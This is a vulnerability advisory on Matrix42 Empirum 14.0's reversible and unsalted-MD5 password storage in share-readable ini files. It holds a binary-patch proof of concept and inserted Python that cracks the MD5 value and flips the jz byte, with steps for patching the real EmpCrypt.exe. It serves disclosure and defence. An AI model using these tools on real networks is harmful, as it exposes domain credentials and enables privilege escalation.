Vulnerability: Empirum Password Obfuscation Design Flaw

# Vuln Title: Empirum Password Obfuscation Design Flaw
# Date: 20.12.2012
# Author: otr
# Software Link:
# Version: 14.0
# Tested on: Windows
# CVE : To be assigned

# Risk: medium
# Type: Privilege Escalation
# Vendor: Matrix42

# STATUS: final


2012-12-20 Flaw Discovered
2013-01-08 Vendor contacted
2013-01-14 Vendor contacted (again)
2013-02-08 Vendor contacted (again)
2013-02-13 No response from vendor
2013-02-13 Public disclosure


The Empirum software from Matrix42 is prone to a trivial password recovery
attack: any user who can read the agent configuration files can recover the
passwords that were obfuscated with EmpCrypt.exe.


Empirum is a product that features software management and OS installation over
the network. For the network installation feature Empirum uses a combination of
bootp/tftp (PXE) and SMB (or http/https). The Empirum server serves two hidden
shares via SMB, EMPINST$ and CONFIGURATOR$. The two shares contain OS images,
software management files and configuration files. The Empirum agent, which is
installed on the client workstations, uses these configuration files in order
to install the operating system, configure it and manage the workstation (e.g.
install patches). Every workstation that is installed this way therefore needs
read access to the shares.

Design Flaw:

The Empirum ini configuration files on the CONFIGURATOR$ share, which define
several settings used by the Empirum agent, also define passwords for use in
Empirum. These are SETUP, MD5, EIS and SYNC. The MD5 value is an unsalted raw
MD5 hash of the password, so it can be attacked offline with a wordlist and the
same password always produces the same value in every configuration file. The
SETUP, EIS and SYNC values use other obfuscation methods. The SETUP, EIS and
SYNC values can be prepared by the Empirum administrator using the EmpCrypt.exe
tool, which is part of Empirum. It was found that sometimes all four password
values in a configuration file are an obfuscation of the same password (it was
not verified whether this is always the case), so recovering the weakest one
recovers all of them.
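The following is an added example, not part of the original advisory or of the
Empirum software: it pulls the four password keys out of a constructed
Empirum-style ini file and runs a wordlist against the MD5 value, which is the
weakest of the four because it is an unsalted raw hash. Only the four key names
and the fact that MD5 is a raw, unsalted hash come from the advisory; the
section name `[Passwords]`, the exact key spelling, the hex encoding of the
value and the wordlist are assumptions made for this example.

```python
import configparser
import hashlib

# Constructed sample of an Empirum-style ini file. The existence of the
# SETUP, MD5, EIS and SYNC values is taken from the advisory; the section
# name, key spelling and the hex encoding of the MD5 value are assumptions.
SAMPLE_INI = """\
[Passwords]
SETUP=*YZXZ
MD5=902fbdd2b1df0c4f70b4a5d23525e932
EIS=not-analyzed
SYNC=not-analyzed
"""

PASSWORD_KEYS = ("SETUP", "MD5", "EIS", "SYNC")

# Constructed wordlist. In practice this would be a real dictionary plus the
# organisation's own naming patterns; "abc" is included to show that the
# hash is case sensitive and only the exact password matches.
WORDLIST = ["password", "Empirum", "matrix42", "abc", "ABC", "Passw0rd"]


def parse_passwords(ini_text):
    """Return {key: value} for every password key found in any section."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str            # keep the key case as written in the file
    cp.read_string(ini_text)
    found = {}
    for section in cp.sections():
        for key in PASSWORD_KEYS:
            if cp.has_option(section, key):
                found[key] = cp.get(section, key)
    return found


def crack_md5(hexdigest, wordlist):
    """Dictionary attack on an unsalted MD5 value.

    No salt means one MD5 computation per candidate is enough, and a hash
    seen in one configuration file can be reused against every other file
    that stores the same password.
    """
    target = hexdigest.strip().lower()
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == target:
            return candidate
    return None


def recover_md5_password(ini_text, wordlist=WORDLIST):
    """Parse the ini text and return the plaintext of its MD5 value, if cracked."""
    values = parse_passwords(ini_text)
    if "MD5" not in values:
        return None
    return crack_md5(values["MD5"], wordlist)


if __name__ == "__main__":
    print(parse_passwords(SAMPLE_INI))
    print("MD5 password:", recover_md5_password(SAMPLE_INI))
```

The same loop, fed with a real dictionary, is all that is needed against the
MD5 value; the SETUP, EIS and SYNC values cannot be checked here because their
algorithms are not documented on this page.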

The SETUP value uses a kind of obfuscation that can easily be reversed with a
modified EmpCrypt.exe. The algorithms behind the EIS and SYNC values were not
analyzed in detail, but they appear to be hashes: for different input values
they produce output of constant length. It was not verified whether
cryptographically secure hash functions are used. SETUP values are not hashes
(their length varies with the input) but some form of reversible encoding.
EmpCrypt.exe already contains the code to decode SETUP values; it is just not
exposed via the command line interface. By reverse engineering and binary
patching it is possible to create a version of EmpCrypt.exe that decodes SETUP
values. There may be simpler ways to achieve this, e.g. an undocumented command
line parameter.

The decoded password can be used by an attacker for various attacks inside a
Windows domain, e.g. to authenticate to other systems as the account the
password belongs to (directly, or via pass-the-hash with the NT hash derived
from it) or to escalate privileges. It may also disclose internal password
policies or password creation patterns, which helps the attacker with further
password cracking.


Proof of concept:

EmpCrypt.exe   /SETUP "ABC"      -> copies the obfuscated value "*YZXZ" to the clipboard
EmpDecrypt.exe /SETUP "*YZXZ"    -> copies the plaintext "ABC" to the clipboard

Empcrypt to EmpDecrypt binary patch:

   EmpDecrypt.exe is a patched EmpCrypt.exe at the following code:

        mov esi, 0Fh
        mov [ebp+var_1C], esi
        mov [ebp+var_20], ebx
        cmp [ebp+var_4F], bl
        jnz loc_402284  <- in the original code this was jz

   Or in hex encoding:

    # diff <(xxd -c 16 EmpCrypt.exe) <(xxd -c 16 EmpDecrypt.exe)
    < 0001510: 45fc 01e8 5815 0000 385d b10f 8463 0100  E...X...8]...c..
    > 0001510: 45fc 01e8 5815 0000 385d b10f 8563 0100  E...X...8]...c..
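The same one-byte change applied programmatically instead of with a hex
editor, as an added example that is not part of the original advisory or of
Matrix42's software. The offset (0x151c, the 13th byte of the xxd line starting
at 0x1510) and the surrounding bytes are copied from the diff above; on x86,
jz rel32 is encoded as 0F 84 and jnz rel32 as 0F 85, which is why only one byte
differs. The sample image is a constructed stand-in, not the real EmpCrypt.exe,
and the section mapping used to turn the file offset of the branch target into
a virtual address is an assumption chosen because it reproduces the
loc_402284 label in the disassembly.

```python
# Offset of the byte that differs in the xxd diff: the line starts at file
# offset 0x1510 and the 13th byte on it (0x84) becomes 0x85.
JCC_OPCODE_OFFSET = 0x1510 + 12

# The 16 bytes of the original EmpCrypt.exe at 0x1510, copied from the diff.
ORIGINAL_LINE = bytes.fromhex("45fc01e858150000385db10f84630100")

# Constructed stand-in for EmpCrypt.exe: zero padding with the known line at
# the right offset. This is not the real binary.
SAMPLE_IMAGE = b"\x00" * 0x1510 + ORIGINAL_LINE + b"\x00" * 0x200


def patch_jz_to_jnz(image, offset=JCC_OPCODE_OFFSET):
    """Return a copy of image in which the jz rel32 (0F 84) whose second
    opcode byte sits at `offset` is turned into jnz rel32 (0F 85).

    The check makes the patch refuse to run against a different build of
    EmpCrypt.exe instead of silently flipping an unrelated byte.
    """
    if image[offset - 1:offset + 1] != b"\x0f\x84":
        raise ValueError("no jz rel32 at 0x%x; different build?" % offset)
    patched = bytearray(image)
    patched[offset] = 0x85
    return bytes(patched)


def branch_target_file_offset(image, offset=JCC_OPCODE_OFFSET):
    """File offset of the jump target. rel32 is relative to the end of the
    6-byte instruction 0F 8x <rel32>, i.e. to offset + 5."""
    rel32 = int.from_bytes(image[offset + 1:offset + 5], "little", signed=True)
    return offset + 5 + rel32


def file_offset_to_va(file_offset, image_base, section_rva, section_raw):
    """Map a raw file offset to a virtual address for a section that is
    loaded from raw offset `section_raw` to RVA `section_rva`. The section
    layout of EmpCrypt.exe is not on the page; image base 0x400000 with
    .text at raw 0x400 / RVA 0x1000 is an assumption that reproduces the
    loc_402284 label from the disassembly."""
    return image_base + (file_offset - section_raw) + section_rva


def xxd_line(image, offset):
    """Render 16 bytes at `offset` in `xxd -c 16` style for comparison with the diff."""
    chunk = image[offset:offset + 16]
    hexpart = " ".join(chunk[i:i + 2].hex() for i in range(0, 16, 2))
    asciipart = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
    return "%07x: %s  %s" % (offset, hexpart, asciipart)


if __name__ == "__main__":
    patched = patch_jz_to_jnz(SAMPLE_IMAGE)
    print("<", xxd_line(SAMPLE_IMAGE, 0x1510))
    print(">", xxd_line(patched, 0x1510))
    target = branch_target_file_offset(SAMPLE_IMAGE)
    print("branch target: file offset 0x%x, VA 0x%x (assumed section mapping)"
          % (target, file_offset_to_va(target, 0x400000, 0x1000, 0x400)))
```

To patch the real file, read EmpCrypt.exe into `image`, write the return value
of `patch_jz_to_jnz` to EmpDecrypt.exe, and compare the two `xxd_line` outputs
with the diff above before running anything.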


In a Windows environment, Active Directory and the domain structure can be used
to handle authentication, so that weakly obfuscated passwords need not be stored
in configuration files that every workstation can read. Until that is the case,
the passwords in the CONFIGURATOR$ ini files should be treated as known to every
account that can read the share, the share ACLs should be limited to the accounts
the agents actually use, and the accounts behind these passwords should be given
no more privileges than the installation requires.